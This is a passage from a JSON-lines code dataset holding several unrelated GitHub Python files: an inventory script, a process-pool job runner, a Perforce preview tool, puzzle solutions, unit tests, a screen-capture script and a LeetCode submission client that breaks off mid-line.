app.exec_()","repo_name":"wangcoolc/Python_For_Qt","sub_path":"pyside2_hige/tabwidget/mdiarea.py","file_name":"mdiarea.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"34392218790","text":"quantprod = {\n 1 : 10,\n 2 : 4,\n 3 : 0,\n 4 : 9\n}\nprices = {\n 1 : 9.99,\n 2 : 19.9,\n 3 : 14.99,\n 4 : 4.99,\n}\n\ncash = 0.0\n#quantProducts = 0\n#priceProductos = 0.0\n\n\n#Functions\ndef getPriceProduct(code):\n return prices.get(code)\n\ndef getQuantityProduct(code):\n return quantprod.get(code)\n\ndef getDetailProduct(code):\n return quantprod.get(code), prices.get(code)\n\ndef getCash():\n return cash\n\ndef addQuantProduct(code, quant):\n quantprod[code] = {quant}\n\ndef setPriceProduct(code, price):\n prices[code] = {price}\n\ndef saleProduct(code):\n global cash\n if getQuantityProduct(code) > 0:\n quantprod[code] = getQuantityProduct(code) - 1\n cash = cash + getPriceProduct(code)\n return True\n else:\n return False\n \ndef replaceProduct(code, quantity):\n global cash\n tot = getPriceProduct(code) * quantity\n if cash < (tot * 0.8):\n return False\n else:\n cash = cash - tot\n quantprod[code] = getQuantityProduct(code) + quantity\n return True\n\ndef getFullStock():\n lista = []\n #print(\"[Code - Units - Price]\")\n for i in quantprod.keys():\n lista.append((i, quantprod.get(i), prices.get(i)))\n return lista\n #print(\"[\", i, \" - \", quantprod.get(i), \" - \", prices.get(i),\"]\") https://refloo.odoo.com/web#cids=1&action=251&model=account.journal&view_type=kanban&menu_id=176\n\n print(getCash())\n\nwhile True:\n print(\"1.-Show full store detail\")\n print(\"2.-Sales\")\n print(\"3.-Replace\")\n print(\"4.-Change price of product\")\n print(\"5.-Exit\")\n print(getCash())\n\n option = int(input())\n \n if option == 1:\n print(\"[Code - Units - Price]\")\n print(getFullStock())\n\n elif option == 2:\n if saleProduct(int(input(\"Enter product code: \"))):\n print(\"Successful sale!\")\n else:\n print(\"Error, item does not exist or is out of stock!\")\n\n elif option == 3:\n if replaceProduct(int(input(\"Enter product code: \")), int(input(\"Units to replace: \"))):\n print(\"Correct Replacement!\")\n else:\n print(\"There is no cash in the box to replace!\")\n\n elif option == 4:\n setPriceProduct(int(input(\"Enter product code: \")), int(input(\"Enter the new price: \")))\n print(\"Price Updated!\")\n\n elif option == 5:\n break","repo_name":"ricardollopis9/module4","sub_path":"storedictionary.py","file_name":"storedictionary.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14999820664","text":"\"\"\"\nmp_pool Module\n================\n\nThe mp_pool module implements and DynamicProcessPool which is similar to the the\nconcurrent.futures.ProcessPoolExecutor, but it has several significant differences.\nEach job that is created starts a process and that process is terminated\nwhen the job is done. This is intended for medium to long run time jobs where it\nis desirable to have the ability to kill a running job. The walltime or each\njob can also be tracked.\n\n\"\"\"\n\nimport multiprocessing as mp\nimport os\nimport subprocess\nimport threading\nimport time\n\n# from collections import deque\nfrom dataclasses import dataclass\nfrom datetime import datetime\n\n# from pathlib import Path\nfrom textwrap import dedent\n\nimport psutil\n\nfrom lqts.core.schema import Job, JobID, JobQueue, JobStatus\nfrom lqts.resources import CPUResourceManager\nfrom lqts.version import VERSION\n\nDEFAULT_WORKERS = max(mp.cpu_count() - 2, 1)\n\n\n@dataclass\nclass WorkItem:\n \"\"\"\n A WorkItem is the object that executes a Job. To do so it has\n * job: the job (including job spec)\n * cores: list of cpu cores assigned to this job\n * process: the process (in the system or cpu sense of the word) that the job executes as\n * logfile: handle to the logfile for writing\n \"\"\"\n\n job: Job\n cores: list = None\n\n mark: int = 0\n\n process: psutil.Process = None\n\n logfile = None # file handle\n\n _logging_thread = None\n\n def start_logging(self):\n \"\"\"\n Opens the log file and writes the job header\n \"\"\"\n if self.job.job_spec.log_file:\n self.logfile = open(self.job.job_spec.log_file, \"w\")\n\n header = dedent(\n f\"\"\"\n Executed with LQTS (the Lightweight Queueing System)\n LQTS Version {VERSION}\n -----------------------------------------------\n Job ID: {self.job.job_id}\n WorkDir: {self.job.job_spec.working_dir}\n Command: {self.job.job_spec.command}\n Started: {self.job.started.isoformat()}\n -----------------------------------------------\n\n \"\"\"\n )\n\n self.logfile.write(header)\n\n def start(self):\n \"\"\"\n Starts the job. The follow steps take place:\n 1. Change directory to the job's working dir\n 2. Optionally start logging\n 3. Start the process\n 4. Set the process priority low so desktop systems stay reponsive\n 5. Set the cpu affinity for the process to the assigned cores\n \"\"\"\n\n # ================================================\n # 1. Change directory to the job's working dir\n # ================================================\n os.chdir(self.job.job_spec.working_dir)\n\n self.job.started = datetime.now()\n\n if self.job.job_spec.log_file:\n # ================================================\n # 2. Optionally start logging\n # ================================================\n self.start_logging()\n\n try:\n # ================================================\n # 3. Start the process\n # ================================================\n self.process = psutil.Popen(\n self.job.job_spec.command,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=False,\n )\n\n # ================================================\n # 4. Set the process priority low so desktop systems stay reponsive\n # ================================================\n if psutil.WINDOWS:\n self.process.nice(psutil.BELOW_NORMAL_PRIORITY_CLASS)\n self.process.ionice(psutil.IOPRIO_LOW)\n elif psutil.LINUX:\n self.process.nice(10)\n self.process.ionice(psutil.IOPRIO_CLASS_BE, value=5)\n\n # ================================================\n # 5. Set the cpu affinity for the process to the assigned cores\n # ================================================\n # Set the cpu affinity for the job so it doesn't hop all over the place\n # This is very helpful on large core systems\n self.process.cpu_affinity(self.cores)\n self.job.cores = self.cores\n\n self._logging_thread = threading.Thread(target=self.get_output)\n self._logging_thread.start()\n\n except FileNotFoundError:\n self.logfile.write(\n f\"\\nERROR: Command not found. Ensure the command is an executable file.\\n\"\n )\n self.logfile.write(\n f\"Make sure you give the full path to the file or \"\n \"that it is on your system path.\\n\\n\"\n )\n # ================================================\n # Flag the job as completed with an error status\n self.job.completed = datetime.now()\n self.job.status = JobStatus.Error\n\n def get_status(self) -> JobStatus:\n \"\"\"\n Get the status of this work item\n \"\"\"\n if self.job.status not in (\n JobStatus.Error,\n JobStatus.Deleted,\n JobStatus.Completed,\n ):\n try:\n # If we can query the process status, it is a live and running\n status = self.process.status()\n self.job.status = JobStatus.Running\n except psutil.NoSuchProcess:\n # If self.process.status() fails, the process has exited\n # so the job is done\n self.job.status = JobStatus.Completed\n if (self.job.walltime is not None) and (self.job.job_spec.walltime is not None):\n if self.job.walltime.total_seconds() > self.job.job_spec.walltime:\n self.job.status = JobStatus.WalltimeExceeded\n self.kill()\n\n return self.job.status\n\n def is_running(self) -> bool:\n \"\"\"\n Convienience method to tell if job status is JobStatus.Running\n \"\"\"\n return self.get_status() == JobStatus.Running\n\n def get_output(self):\n \"\"\"\n Reads some output from the process and writes it to the logfile\n \"\"\"\n # print(f\"Work item logging jobid= {self.job.job_id}\")\n time.sleep(5)\n try:\n while True:\n line = self.process.stdout.read(64)\n # line += self.process.stderr.read(256)\n line = line.decode().replace(\"\\r\", \"\").replace(\"\\n\\n\", \"\\n\")\n # print(f\"{line=}\")\n self.logfile.write(line)\n self.logfile.flush()\n except Exception as ex:\n # import traceback\n # traceback.print_exc()\n pass\n\n def clean_up(self):\n \"\"\"\n Mark sjob as completed and write epilogue to logfile\n \"\"\"\n\n # self.get_output()\n\n self.job.completed = datetime.now()\n\n if not self.job.job_spec.log_file:\n return\n\n footer = dedent(\n f\"\"\"\n -----------------------------------------------\n Job Performance\n -----------------------------------------------\n Started: {self.job.started.isoformat()}\n Ended: {self.job.completed.isoformat()}\n Elapsed: {self.job.walltime}\n -----------------------------------------------\n \"\"\"\n )\n\n try:\n self.logfile.write(footer)\n\n self.logfile.close()\n except:\n pass\n\n def kill(self):\n \"\"\"\n Kill this job and set its status to deleted\n \"\"\"\n self.process.kill()\n self.job.status = JobStatus.Deleted\n\n\n@dataclass\nclass Event:\n job: Job\n event_type: str\n when: datetime\n\n\nclass DummyLogger:\n def debug(self, *args):\n pass\n\n def info(self, *args):\n pass\n\n def error(self, *args):\n pass\n\n\nclass DynamicProcessPool:\n \"\"\"\n A process pool that can be resized. Individual processes may be terminated.\n It can send notifications of job starts and completions.\n \"\"\"\n\n def __init__(\n self,\n queue: JobQueue,\n max_workers: int = DEFAULT_WORKERS,\n feed_delay: float = 0.0,\n manager_delay: float = 1.0,\n ):\n self.job_queue: JobQueue = queue\n\n self.CPUManager = CPUResourceManager(\n min(max(max_workers, 1), mp.cpu_count() - 1)\n )\n\n self.feed_delay = feed_delay # delay between subsequent job start ups\n\n self.manager_delay = manager_delay # delay in manager thread loop\n\n self._work_items: dict[JobID, WorkItem] = {}\n\n # self._queue = deque()\n\n self.__exiting = False\n\n self.q_lock = threading.Lock()\n\n self.w_lock = threading.Lock()\n\n self._event_callbacks = set()\n\n self.log = DummyLogger()\n self._logging_threads = []\n\n self.__paused: bool = False\n self.__manager_thread = None\n\n @property\n def max_workers(self) -> int:\n return self.CPUManager.cpu_count\n\n @max_workers.setter\n def max_workers(self, value):\n self.resize(value)\n\n def set_logger(self, logger):\n self.log = logger\n\n def resize(self, max_workers):\n \"\"\"\n Adjusts the number of worker processes that may be used.\n\n Parameters\n ----------\n max_workers: int\n Maximum number of workers\n \"\"\"\n more_capacity = max_workers > self.max_workers\n if max_workers is not None:\n self.CPUManager.resize(max_workers)\n\n if more_capacity:\n self.feed_queue()\n\n def process_completions(self, timeout=2.0):\n \"\"\"\n Handles getting the results when a job is done and cleaning up\n worker processes that have finished. It then calls feed_queue\n to ensure that work continues to be done.\n\n Parameters\n ----------\n timeout: int\n A timeout for waiting on a result\n\n \"\"\"\n work_item: WorkItem\n\n # see if any results are available\n for job_id, work_item in list(self._work_items.items()):\n if not work_item.is_running():\n # the work_item has completed\n work_item.mark += 1\n if work_item.mark > 1:\n # clean it up\n work_item.clean_up()\n # free the cpu resources\n self.CPUManager.free_processors(work_item.cores)\n\n job = work_item.job\n\n self.log.info(\"Got result {} = {}\".format(job.job_id, job))\n self.job_queue.on_job_finished(job)\n self._work_items.pop(job_id)\n\n def get_log_output(self):\n \"\"\"\n Handles getting the results when a job is done and cleaning up\n worker processes that have finished. It then calls feed_queue\n to ensure that work continues to be done.\n\n Parameters\n ----------\n timeout: int\n A timeout for waiting on a result\n\n \"\"\"\n work_item: WorkItem\n\n # see if any results are available\n for work_item in list(self._work_items.values()):\n if work_item.is_running():\n print(f\"-->Getting output {work_item.job.job_id}\")\n work_item.get_output()\n\n def submit_one_job(self, job: Job, cores: list) -> tuple[bool, WorkItem]:\n \"\"\"Start one job running in the pool\"\"\"\n\n work_item = WorkItem(job=job, cores=cores)\n\n work_item.start()\n\n self.job_queue.on_job_started(job)\n\n return True, work_item\n\n def feed_queue(self):\n \"\"\"\n Starts up jobs while there are jobs in the queue and there are workers\n available.\n \"\"\"\n\n while len(self.job_queue.queued_jobs) > 0:\n job = self.job_queue.next_job()\n\n if job is None:\n # no jobs available\n break\n\n some_available, cores = self.CPUManager.get_processors(\n count=job.job_spec.cores\n )\n\n if not some_available:\n # not enough cores are available to run this job\n break\n\n # while there is work to do and workers available, start up new jobs\n job_was_submitted, work_item = self.submit_one_job(job, cores)\n self._work_items[job.job_id] = work_item\n\n if job_was_submitted:\n time.sleep(self.feed_delay)\n else:\n break\n\n def pause(self):\n self.__paused = True\n\n def unpause(self):\n self.__paused = False\n\n def kill_job(self, job_id_to_kill, kill_all=False) -> int:\n \"\"\"\n Kills the job with ID *job_id_to_kill*\n\n Parameters\n ----------\n job_id_to_kill : int\n\n Returns\n -------\n success: bool\n True if the job was found and killed, False is the job was not found.\n \"\"\"\n\n if kill_all:\n job_ids_to_kill = list(self._work_items.keys())\n else:\n job_ids_to_kill = [job_id_to_kill]\n\n killed_jobs = []\n for jid in job_ids_to_kill:\n try:\n work_item = self._work_items.pop(jid)\n work_item.kill()\n print(f\"killing running job {jid}\")\n self.CPUManager.free_processors(work_item.cores)\n killed_jobs.append(jid)\n except psutil.NoSuchProcess:\n pass\n\n return len(killed_jobs) > 0\n\n def _runloop(self):\n \"\"\"\n This is the loop that manages getting job completetions, taking care of the sub-processes\n and keeping the queue moving\n \"\"\"\n # i = 0\n while True:\n time.sleep(self.manager_delay)\n # print(f\"Cycling {i=}\")\n # check for finished jobs\n self.process_completions()\n\n # if (i := i + 1) == 20:\n # # get log output every 20th time through this loop\n # print(\"Getting output 0\")\n # self.get_log_output()\n # i = 0\n\n if self.__exiting:\n if len(self._work_items) == 0:\n # we are done\n return\n else:\n # we still have some clean up to do\n continue\n\n elif self.__paused:\n # don't do anything this time through the loop\n continue\n\n else:\n # start up new jobs\n self.feed_queue()\n\n # def join(self, timeout=None):\n # \"\"\"\n # Blocks until all jobs are complete\n # Parameters\n # ----------\n # timeout: int\n # optional time value\n # \"\"\"\n # self.log.debug(\"waiting to join\")\n # value = \"\"\n # while len(self._work_items) > 0:\n # value = self.__signal_queue.get(timeout=timeout)\n # self.log.debug(\"join received signal: {}\".format(value))\n\n def join(self, wait: bool = True):\n \"\"\"\n If wait is True, this blocks until all jobs are complete.\n If wait is False, then running jobs are killed and we wait for\n the manager thread to complete\n \"\"\"\n self.shutdown(wait=wait)\n self.__manager_thread.join()\n\n def shutdown(self, wait: bool = True):\n \"\"\"\n Shuts down the pool.\n\n Parameters\n ----------\n wait: bool\n If True, wait until all jobs are complete, then shutdown.\n If False then kill the processes and shutdown immediately\n \"\"\"\n self.__exiting = True\n\n if not wait:\n for work_item in self._work_items.values():\n # kill running jobs\n work_item.kill()\n\n def _start_manager_thread(self) -> threading.Thread:\n \"\"\"\n Starts the thread that manages the process pool\n\n Returns\n -------\n t: threading.Thread\n The management thread\n \"\"\"\n t = threading.Thread(target=self._runloop)\n t.start()\n self.__manager_thread = t\n return t\n\n def _start_sync(self):\n \"\"\"\n Starts the management function synchronously. Use only for debugging\n \"\"\"\n self._runloop()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.shutdown(wait=True)\n return False\n\n def add_event_callback(self, func):\n \"\"\"\n Registers a callback function that is called when jobs start or stop\n\n Parameters\n ----------\n func : callable\n\n\n \"\"\"\n self._event_callbacks.add(func)\n","repo_name":"brakedust/lqts","sub_path":"lqts/mp_pool2.py","file_name":"mp_pool2.py","file_ext":"py","file_size_in_byte":16880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20643997501","text":"# -*- coding: utf-8 -*-\nimport os\nimport random\nimport tempfile\nimport string\nimport binascii\nimport argparse\nimport subprocess\n\nfrom svglib.svglib import svg2rlg\nfrom reportlab.graphics import renderPM\nfrom PIL import Image\n\n\ndef gen_vector_dam_preview(vector_filepath):\n if vector_filepath.lower().endswith(\"eps\"):\n gen_eps_dam_preview_attr(vector_filepath)\n elif vector_filepath.lower().endswith(\"svg\"):\n gen_svg_dam_thumb_attr(vector_filepath)\n else:\n print(\"format unsupported at this time\")\n\n\ndef gen_eps_dam_preview_attr(eps_filepath):\n file_dir, file_name = os.path.split(eps_filepath)\n\n with tempfile.TemporaryDirectory() as tmp_dir:\n filepath = os.path.join(tmp_dir, get_random_word())\n img_path = \".\".join([filepath, \"jpg\"])\n\n eps_image = Image.open(eps_filepath)\n eps_image.load(scale=10)\n eps_image.save(img_path)\n\n with open(img_path, \"rb\") as file_buff:\n hex_string = binascii.hexlify(file_buff.read())\n for attr in [\"thumb\", \"preview\", \"blur\"]:\n commands = [\"p4\", \"attribute\", \"-fei\", \"-n\", attr, file_name]\n if attr == \"blur\":\n commands = [\"p4\", \"attribute\", \"-fi\", \"-n\", attr, file_name]\n hex_string = bytes(\"U4DbZs009u=X7O9a599t=EtQ~U-U01~C0Mxa\", \"utf-8\")\n\n proc = subprocess.Popen(\n commands,\n stdout=subprocess.PIPE,\n stdin=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=file_dir,\n )\n\n attr_stdout = proc.communicate(input=hex_string)[0]\n print(attr_stdout.decode())\n\n\ndef gen_svg_dam_thumb_attr(svg_filepath):\n file_dir, file_name = os.path.split(svg_filepath)\n\n with tempfile.TemporaryDirectory() as tmp_dir:\n filepath = os.path.join(tmp_dir, get_random_word())\n img_path = \".\".join([filepath, \"jpg\"])\n\n drawing = svg2rlg(svg_filepath)\n renderPM.drawToFile(drawing, img_path, fmt=\"JPG\")\n\n with open(img_path, \"rb\") as file_buff:\n hex_string = binascii.hexlify(file_buff.read())\n for attr in [\"thumb\", \"blur\"]:\n commands = [\"p4\", \"attribute\", \"-fei\", \"-n\", attr, file_name]\n if attr == \"blur\":\n commands = [\"p4\", \"attribute\", \"-fi\", \"-n\", attr, file_name]\n hex_string = bytes(\"U4DbZs009u=X7O9a599t=EtQ~U-U01~C0Mxa\", \"utf-8\")\n\n proc = subprocess.Popen(\n commands,\n stdout=subprocess.PIPE,\n stdin=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=file_dir,\n )\n\n attr_stdout = proc.communicate(input=hex_string)[0]\n print(attr_stdout.decode())\n\n\ndef get_random_word(length=12):\n return \"\".join(random.sample(string.ascii_letters, length))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"vector_filepath\")\n\n parsed_args = parser.parse_args()\n gen_vector_dam_preview(parsed_args.vector_filepath)\n","repo_name":"rmaffesoli/p4v_custom_tools","sub_path":"update_dam_preview_vector.py","file_name":"update_dam_preview_vector.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"6966493345","text":"from unittest import TestCase\nfrom migrate_exblog.utils import get_title_class, get_body_class, get_tail_class\nfrom bs4 import BeautifulSoup\nSTRUCTURE = r\"\"\"
\n
\n<$postdate$>\n
\n\n\n \n

<$postsubject$>

<$postadmin type=1$>
\n
\n<$postcont$>\n
\n
<$posttail$>
\n<$cmtjs$>\n
\"\"\"\n\n\nclass TestUtils(TestCase):\n def setUp(self):\n self.soup = BeautifulSoup(STRUCTURE, 'html.parser')\n\n def test_get_title_class(self):\n actual = get_title_class(self.soup)\n self.assertEqual('POST_TTL', actual)\n\n def test_get_body_class(self):\n actual = get_body_class(self.soup)\n self.assertEqual('POST_BODY', actual)\n\n def test_get_tail_class(self):\n actual = get_tail_class(self.soup)\n self.assertEqual('POST_TAIL', actual)\n","repo_name":"Hagihara-A/migrate-exblog","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70347447846","text":"class Solution:\n def minimumAbsDifference(self, arr: List[int]) -> List[List[int]]:\n minimumDiff = 2**31-1; pairs = []\n arr.sort()\n for i in range(len(arr)-1):\n if arr[i+1]-arr[i] < minimumDiff:\n minimumDiff = arr[i+1]-arr[i]\n for i in range(len(arr)-1):\n if arr[i+1]-arr[i] == minimumDiff:\n pairs.append([arr[i],arr[i+1]])\n return pairs","repo_name":"BrynjarGeir/LeetCode","sub_path":"Easy/minimum_absolute_difference.py","file_name":"minimum_absolute_difference.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15199499191","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\n\nwith open(os.path.dirname(os.path.abspath(__file__)) + \"/input/my-input.txt\", \"r\") as f:\n#with open(os.path.dirname(os.path.abspath(__file__)) + \"/input/example.txt\", \"r\") as f:\n df = f.readlines()\n\nfor x in range(len(df)):\n df[x] = df[x].strip()\n\nm = [None] * len(df)\nly = len(df)\nlx = len(df[0])\n\nfor y in range(ly):\n mm = [0] * lx\n for x in range(lx):\n mm[x] = int(df[y][x])\n m[y] = mm\n\ndef isGodor(y,x):\n # east,west,south,north\n d = [10] * 4\n if y > 0:\n d[0] = m[y - 1][x]\n if x > 0:\n d[1] = m[y][x - 1]\n if y < ly -1:\n d[2] = m[y + 1][x]\n if x < lx - 1:\n d[3] = m[y][x + 1]\n for a in range(4):\n if d[a] <= m[y][x]:\n return False\n return True\n\nsm = 0\nfor y in range(ly):\n for x in range(lx):\n if isGodor(y, x):\n sm = sm + (m[y][x] + 1)\n\nprint(\"The result:\",sm)\n\n","repo_name":"gelleicsaba/aoc2021","sub_path":"Day-09_Smoke Basin/sln-1.py","file_name":"sln-1.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72008429605","text":"class P:\n a = 10\n\n def __init__(self):\n print('Parent constructor')\n self.b = 20\n\n def m01(self):\n print('Parent instance method')\n\n @classmethod\n def m02(cls):\n print('Parent class method')\n\n @staticmethod\n def m03():\n print('Parent static method')\n\n\nclass C(P):\n pass\n\n\nc = C()\nprint(c.a)\nprint(c.b)\nc.m01()\nc.m02()\nc.m03()\nprint('Accessing with C')\n# C.m01()\n# TypeError: m01() missing 1 required positional argument: 'self'\nC.m02()\nC.m03()\n\n# Parent constructor\n# 10\n# 20\n# Parent instance method\n# Parent class method\n# Parent static method\n# Accessing with C\n# Parent class method\n# Parent static method\n","repo_name":"ksrntheja/08-Python-Core","sub_path":"venv/oops/89ISAConstructorAllMethods.py","file_name":"89ISAConstructorAllMethods.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3232412805","text":"import argparse\nimport logging\nimport sys\nimport os\n\nsys.path.insert(0,'/Users/prokarma/kumar/workspace/machine-learning')\n\nfrom nlu.config import PkrmNLUConfig\nfrom nlu.model import Trainer\nfrom nlu.converters import load_data\n\nlogger = logging.getLogger(__name__)\n\ndef create_argparser():\n\tparser = argparse.ArgumentParser(description='train a custom language parser')\n\tparser.add_argument('-c', '--config', required=True,\n\t\t\t\t\t\thelp=\"PKRM NLU configuration file\")\n\tparser.add_argument('-m', '--mitie_file', default=None,\n\t\t\t\t\t\thelp='File with mitie total_word_feature_extractor')\n\treturn parser\n\t\ndef init():\n\tparser = create_argparser()\n\targs = parser.parse_args()\n\tconfig = PkrmNLUConfig(args.config, os.environ, vars(args))\n\treturn config\n\t\ndef do_train(config, component_builder=None):\n\ttrainer = Trainer(config, component_builder)\n\tpersistor = None\n\ttraining_data = load_data(config['data'])\n\tinterpreter = trainer.train(training_data)\n\tpersisted_path = trainer.persist(config['path'], persistor, model_name=config['name'])\n\treturn trainer, interpreter, persisted_path\n\nif __name__ == '__main__':\n\tconfig = init()\n\tlogging.basicConfig(level=config['log_level'])\n\tdo_train(config)\n\tlogger.info(\"Finished training\")","repo_name":"kranthiB/nlu","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71995747046","text":"import numpy as np\nimport tensorflow as tf\n\nfrom tests.helper import assert_variables\nfrom tests.layers.flows.helper import invertible_flow_standard_check\nfrom tfsnippet.layers import FeatureShufflingFlow\n\n\nclass FeatureShufflingFlowTestCase(tf.test.TestCase):\n\n def test_feature_shuffling_flow(self):\n np.random.seed(1234)\n\n with self.test_session() as sess:\n # axis = -1, value_ndims = 1\n x = np.random.normal(size=[3, 4, 5, 6]).astype(np.float32)\n x_ph = tf.placeholder(dtype=tf.float32, shape=[None, None, None, 6])\n permutation = np.arange(6, dtype=np.int32)\n np.random.shuffle(permutation)\n y = x[..., permutation]\n log_det = np.zeros([3, 4, 5]).astype(np.float32)\n\n layer = FeatureShufflingFlow(axis=-1, value_ndims=1)\n y_out, log_det_out = layer.transform(x_ph)\n sess.run(tf.assign(layer._permutation, permutation))\n y_out, log_det_out = sess.run(\n [y_out, log_det_out], feed_dict={x_ph: x})\n\n np.testing.assert_equal(y_out, y)\n np.testing.assert_equal(log_det_out, log_det)\n\n invertible_flow_standard_check(\n self, layer, sess, x_ph, feed_dict={x_ph: x})\n\n assert_variables(['permutation'], trainable=False,\n scope='feature_shuffling_flow',\n collections=[tf.GraphKeys.MODEL_VARIABLES])\n\n # axis = -2, value_ndims = 3\n x = np.random.normal(size=[3, 4, 5, 6]).astype(np.float32)\n x_ph = tf.placeholder(dtype=tf.float32, shape=[None, None, 5, None])\n permutation = np.arange(5, dtype=np.int32)\n np.random.shuffle(permutation)\n y = x[..., permutation, :]\n log_det = np.zeros([3]).astype(np.float32)\n\n layer = FeatureShufflingFlow(axis=-2, value_ndims=3)\n y_out, log_det_out = layer.transform(x_ph)\n sess.run(tf.assign(layer._permutation, permutation))\n y_out, log_det_out = sess.run(\n [y_out, log_det_out], feed_dict={x_ph: x})\n\n np.testing.assert_equal(y_out, y)\n np.testing.assert_equal(log_det_out, log_det)\n\n invertible_flow_standard_check(\n self, layer, sess, x_ph, feed_dict={x_ph: x})\n","repo_name":"haowen-xu/tfsnippet","sub_path":"tests/layers/flows/test_rearrangement.py","file_name":"test_rearrangement.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"52"} +{"seq_id":"36443034526","text":"import PIL\nfrom PIL import ImageGrab\nimport time\nimport datetime\nimport os\nimport numpy as np\nimport sys\n\nx_min = 0 #各自調整してください\nx_max = 1440 - 215\ny_min = 0\ny_max = 900 - 45\ninterval = 1.0 #画面収録の間隔です\npercent = 5.0\nthreshold = 10.0\n\narea = (x_max - x_min)*(y_max - y_min)\n\ndt_now = datetime.datetime.now()\n\nos.chdir(os.path.expanduser('~'))\nfilepath = './'\nfor i in range(10):\n filepath = './Desktop/'+str(dt_now.year)+'_'+str(dt_now.month)+'_'+str(dt_now.day)+'_'+str(i)\n if os.path.exists(filepath) == False :\n os.makedirs(filepath)\n break\n\nsave_path = os.path.join(os.path.expanduser('~'),filepath)\nos.chdir(save_path)\nprint('キャプチャを開始します。')\ntime.sleep(5)\n\nim_mat_past = 0\nj = 0\n\ntry:\n while True:\n im = ImageGrab.grab(bbox=(x_min, y_min, x_max, y_max))\n im_mat = np.array(im.convert('L'))\n diff = np.abs(im_mat - im_mat_past)\n diff_per = (np.count_nonzero(diff > int(percent * 256.0 / 100.0)) / area ) * 100\n print(diff_per)\n if diff_per > threshold :\n im.save('captured_'+str(j)+'.png')\n j = j + 1\n im_mat_past = im_mat\n time.sleep(interval)\n\nexcept KeyboardInterrupt:\n print('キャプチャを終了します。')\n sys.exit(0)\n","repo_name":"kotarokotarokotaro/pp_haihu_shite","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14023528030","text":"\"\"\"\nSource: assessed on 04/10/2022 from:\nhttps://github.com/sunset1995/HorizonNet/blob/master/preprocess.py\n\nIt is modified to return an aligned paronama image for the model.\n\"\"\"\nimport numpy as np\nfrom PIL import Image\n\nfrom horizon_net.misc.pano_lsd_align import panoEdgeDetection, rotatePanorama\n\n\ndef preprocess(img):\n\n q_error = 0.7\n refine_iter = 3\n # Load and cat input images\n img_ori = np.array(img.resize((1024, 512), Image.BICUBIC))[..., :3]\n\n # VP detection and line segment extraction\n _, vp, _, _, panoEdge, _, _ = panoEdgeDetection(\n img_ori, qError=q_error, refineIter=refine_iter\n )\n panoEdge = panoEdge > 0\n # Align images with VP\n i_img = rotatePanorama(img_ori / 255.0, vp[2::-1])\n return Image.fromarray((i_img * 255).astype(np.uint8))\n","repo_name":"sammaule/fsdl-2022-3D-reconstruction","sub_path":"horizon_net/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36525625685","text":"from http import HTTPStatus\nfrom time import sleep\nfrom typing import Optional\n\nfrom pydantic import BaseModel\nfrom pydantic import Field\nfrom requests import Session as BaseSession\nfrom requests.models import Response\nfrom mistletoe import Document\nfrom mistletoe.block_token import CodeFence\n\nfrom .graphql_queries import QUERY_SOLUTIONS\nfrom .graphql_queries import QUERY_SOLUTION\nfrom .article_metadata_response import ArticleMetadataResponse\nfrom .article_response import ArticleResponse\n\nclass SubmissionResult(BaseModel):\n status: str = Field(alias='state')\n output: str = Field(alias='std_output')\n submission_id: int\n testcase_number: int = Field(alias='total_testcases')\n correct_number: int = Field(alias='total_correct')\n\nclass SubmissionRequest(BaseModel):\n submission_id: int\n\nclass Solution(BaseModel):\n language: str\n code: str\n\nclass Session(BaseSession):\n def __init__(self, username: str, password: str, endpoint: str = 'leetcode.cn'):\n super().__init__()\n\n self.username = username\n self.password = password\n self.endpoint = endpoint\n\n self.login()\n\n def login(self):\n login_url = f'https://{self.endpoint}/accounts/login'\n self.get(login_url, verify=False)\n self.post(\n url=login_url,\n data={'login': self.username, 'password': self.password},\n headers={'Referer': login_url}\n )\n\n def request(self, *args, **kwargs) -> Response:\n response = super().request(*args, **kwargs)\n\n if not response.status_code == HTTPStatus.OK:\n raise ValueError(f'response status is {response.status_code}: {response.text}')\n\n return response\n\n def submit(self, question_id, question_slug, code, language) -> int:\n response = self.post(\n url=f'https://{self.endpoint}/problems/{question_slug}/submit/',\n json={\n \"question_id\": question_id,\n \"lang\": language,\n \"typed_code\": code,\n \"test_mode\": False,\n \"test_judger\": \"\",\n \"questionSlug\": question_slug\n },\n headers={\n 'Referer': f'https://{self.endpoint}/problems/{question_slug}/submissions/',\n }\n )\n return SubmissionRequest.parse_raw(response.text)\n\n def get_result(self, submission_id, timeout: int = 10, interval: int = 1) -> SubmissionResult:\n for 